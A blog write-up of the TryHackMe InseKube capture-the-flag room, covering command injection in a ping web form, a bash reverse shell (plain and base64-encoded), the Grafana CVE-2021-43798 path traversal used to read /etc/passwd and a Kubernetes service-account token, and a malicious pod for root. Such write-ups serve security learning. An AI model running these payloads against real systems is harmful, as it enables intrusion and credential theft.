InseKube CTF — TryHackMe

Arrow
6 min read · Mar 7, 2022
Insekube CTF.

Hello everyone!
Long time no hacking or writing anything at all. Everyday life can be a little crazy from time to time (and I hope it won't get any crazier from this point on, as the whole planet is in hot water, but we are not here to discuss that).
So, this is my first write-up of 2022, and I chose the InseKube CTF as it seemed like an interesting scenario built around a fairly new technology (in comparison with the traditional ones) that is gaining more and more fans.

So, really quick: in this challenge we are dealing with a Kubernetes setup and, along with it, a recent Grafana vulnerability.

Let’s jump into this right away!
Proposed soundtrack: https://www.youtube.com/watch?v=AxdPucdC9JI

Enumeration

First things first, the enumeration.
Having some experience with Kubernetes myself, and knowing some of the ports that might be exposed (https://kubernetes.io/docs/reference/ports-and-protocols/), I thought it would be a good idea to start with a masscan scan instead of the usual nmap, in order to save some waiting time.
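For reference, a typical invocation looks something like the line below (the full port range and the rate are just my usual defaults, not something dictated by the room):

sudo masscan -p1-65535 --rate=1000 <TARGET_IP>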

Masscan Scan.

Taking a look at the results, I was a little confused at first. Reading the CTF's description (which states that the challenge is set up inside Minikube), it made perfect sense why the classic K8s ports weren't there. To give a little background, Minikube is a tool, usually used for development and testing purposes, that helps you quickly and easily set up a local Kubernetes cluster on the OS of your choice (https://minikube.sigs.k8s.io/docs/).

A quick check with Nmap as well, to see if we can get more info on the open ports. But nothing we don't already know. Let's head to the website and see what is waiting for us.
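Something along these lines does the trick (substitute the ports that masscan actually reported for you):

nmap -sC -sV -p <ports-from-masscan> <TARGET_IP>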

Nmap scan.

The landing page is quite simple. Just a "ping" application that lets you know whether the host provided is ping-able or not. And here the real fun starts.

Is it up or down?

The first thing that comes to my mind when I meet this type of setup is to try a simple remote command execution, just something reeeealy simple to put my suspicion to the test.
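In this case that means appending a second command to the host field of the form, for example something like the payload below (the host value itself barely matters, the "; ls" part is what we care about):

127.0.0.1; ls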

Testing the RCE.

As is clear from the output, the application successfully executed the ping command and, right afterwards, the ls command. Did I hear someone screaming "Reverse Shell" here?

Reverse Shell

Let's fire up Burp Suite to capture a request to the server and modify it so we can land our reverse shell. Also, let's start NetCat on our port of choice.

nc -lvnp 9999

OK, now, to trigger the reverse shell and get access to the remote server, all we need to do is execute the following through Burp Suite.

echo "bash -i >& /dev/tcp/10.10.118.248/9999 0>&1" | bash;

However, we will need to inject the reverse shell in base64 form, so what will actually end up being executed on the remote server is the command below:

echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xMTguMjQ4Lzk5OTkgMD4mMQo=" | base64 -d | bash;
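If you want to reproduce the encoded string yourself, piping the plain payload through base64 on your own machine gives exactly that blob (remember to swap in your own IP and port):

echo "bash -i >& /dev/tcp/10.10.118.248/9999 0>&1" | base64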

BurpSuite Request and Reverse Shell.

Grafana LFI

Enumerating the remote host a little, we can see some interesting info in its environment variables and, more precisely, the fact that there is a Grafana server.

env parameters.
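A quick way to zero in on it: Kubernetes injects service-discovery variables such as GRAFANA_SERVICE_HOST and GRAFANA_PORT into every pod, so a simple filter is usually enough (the exact variable names may differ in your output):

env | grep -i grafana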

Grafana is no stranger to some good vulnerabilities and, very recently, a pretty good one was discovered that affected a number of Grafana 8.x versions, up to and including 8.3.0 (https://grafana.com/blog/2021/12/07/grafana-8.3.1-8.2.7-8.1.8-and-8.0.7-released-with-high-severity-security-fix/). Let's see which version the Grafana instance in our case is running with a simple curl on its login page.

curl http://10.108.133.228:3000/login

We will get back a pretty lengthy HTML page. Going through it quickly, we can see that the installed Grafana is version 8.3.0-beta2, so according to the advisory linked above it is vulnerable to CVE-2021-43798.
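If you don't feel like scrolling, grepping the response works too; the version string is embedded in the page's bootstrap data, although the exact JSON key may vary between Grafana releases:

curl -s http://10.108.133.228:3000/login | grep -o '"version":"[^"]*"'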

This article also explains in great detail how we can use this vulnerability to access files such as /etc/passwd. All good, but what should we do afterwards? Let's move on to the next piece of the puzzle.
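As a sanity check, the classic proof of concept is a path traversal through one of the bundled plugin routes, the same trick we will reuse later for the token:

curl --path-as-is http://10.108.133.228:3000/public/plugins/alertlist/../../../../../../../../etc/passwd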

Kubernetes Cluster

So, we know that this machine is hosting a Kubernetes cluster. If you search a little, you will find out that the most valuable tool for managing a Kubernetes cluster is kubectl (https://kubernetes.io/docs/tasks/tools/). At first glance, it seems like kubectl is not installed for the user; however, if we search for the binary itself, we will find it in the /tmp directory.
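A quick one-liner to hunt it down (this is just the generic way I look for a binary; on a different setup it may live somewhere other than /tmp):

which kubectl || find / -name kubectl -type f 2>/dev/null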

In this article, you can take a look at the most used/essential kubectl commands.

The first command I went with was "/tmp/kubectl get pods", in order to check whether something is currently up and running on the cluster; however, it seems that the user is missing the permissions for that.

Trying to get the pods.
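If you want to see exactly what the current service account is (not) allowed to do, kubectl has a built-in permission check; a quick sketch:

/tmp/kubectl auth can-i --list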

Generally speaking, it is a very good strategy to set up an authentication mechanism in case someone (you know, someone malicious) tries to take advantage of the Kubernetes cluster (https://kubernetes.io/docs/reference/access-authn-authz/authentication/). The easiest way is to set up a token that you pass along with every kubectl command you run. All those tokens, though, are saved on the local machine in the file /var/run/secrets/kubernetes.io/serviceaccount/token (https://kubernetes.io/docs/tasks/run-application/access-api-from-pod/). Bad luck for the guys that made the setup… We can definitely make use of the Grafana LFI vulnerability to get our hands on the cluster token.

Putting the two pieces of the puzzle together

Now that we have everything we want, let's put it to the test by running the following command and assigning the output to a variable, so that we can work with it more easily:

curl --path-as-is http://10.108.133.228:3000/public/plugins/alertlist/../../../../../../../../var/run/secrets/kubernetes.io/serviceaccount/token
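Wrapping that same request in a command substitution takes care of the variable part (the name TOKEN is just my choice):

TOKEN=$(curl -s --path-as-is http://10.108.133.228:3000/public/plugins/alertlist/../../../../../../../../var/run/secrets/kubernetes.io/serviceaccount/token)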

So here, we got ourselves the token!!

Getting the token.

Let's try once more to list the pods available in the default Kubernetes namespace. Bingo! The token gave us the permissions we needed.
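The call itself looks something like the line below, passing the stolen token through kubectl's --token flag (if you didn't store it in a variable, just paste it inline):

/tmp/kubectl --token="$TOKEN" get pods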

Bingo!

Final step

And now we are heading for the final step. The creator of the room has done a really good job of providing the info and the study material for getting the root user, so I am not going to repeat it here. Just head to the challenge's room and have a good read.

For this final step we will need the yaml of the malicious pod here, with a bit of a twist, as the image is already available on the Minikube cluster and the remote host does not have any internet access anyway. In the yaml file, simply add the imagePullPolicy: IfNotPresent tag just below the image: ubuntu tag. Pay extra attention to the spaces while you make that addition, otherwise the yaml won't be accepted as valid by the Kubernetes cluster and it will refuse to start the pod for you.
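For orientation, the containers section of the edited yaml ends up looking roughly like this (only a sketch of the relevant fragment; the container name and the rest of the spec come from the yaml linked in the room, and the new line must be indented exactly like the image: line):

  containers:
  - name: <container-name>
    image: ubuntu
    imagePullPolicy: IfNotPresent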

Once we have our yaml ready on our local machine, we can fire up an HTTP server using Python, to help us download the file to the remote machine easily.

python3 -m http.server 8001

Once we have downloaded the file on the remote machine, we can use the "kubectl apply -f" command to bring our "bad" pod to life.
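On the victim side it would look roughly like this (assuming curl is available on the box, which it was for the Grafana step, that the file is named pod.yaml, and swapping in your own attacker IP):

curl http://<ATTACKER_IP>:8001/pod.yaml -o /tmp/pod.yaml
/tmp/kubectl --token="$TOKEN" apply -f /tmp/pod.yaml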

Hello little malicious pod!

Once the pod has turned into the "Running" status, we can get an interactive shell into it.
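That last step is a standard kubectl exec; a sketch (the pod name is whatever you set in the yaml's metadata):

/tmp/kubectl --token="$TOKEN" exec -it <pod-name> -- /bin/bash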

Root!!

That’s all guys for today!
I hope you enjoyed my write-up, as much as I enjoyed writing it.
See you next time and keep hacking! :)

